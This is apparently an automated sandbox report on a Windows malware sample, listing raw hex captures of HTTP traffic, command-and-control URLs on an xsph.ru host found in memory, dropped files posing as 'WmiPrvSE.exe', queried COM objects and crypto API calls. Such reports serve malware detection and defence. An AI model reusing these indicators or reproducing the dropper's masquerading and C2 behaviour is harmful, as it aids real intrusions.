6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:21:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:21:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003558000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003443000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru
            Source: WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru/
            Source: WmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWco
            Source: WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6a
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp
            Source: WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3726045478.000000001BA53000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=
            Source: WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a0947291.xsph.ruPo
            Source: componentWininto.exe, 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.000000000288B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.000000000352E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://index.from.sh/pages/game.html
            Source: C:\msPortRefnetdhcp\componentWininto.exe Window created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: 3_2_0027718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Windows\ShellComponents\e5c7b42f1665e5
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: String function: 0028E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: String function: 0028ED00 appears 31 times
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: String function: 0028E360 appears 52 times
            Source: 4c6fK85tK7.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: yberLoad.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
            Source: yberLoad.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: 4c6fK85tK7.exe, 00000000.00000003.1625661090.0000000002639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000003.1625661090.0000000002639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000000.1620317940.0000000000408000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000000.1620317940.0000000000408000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe Binary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformBlock'
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformBlock'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformBlock'
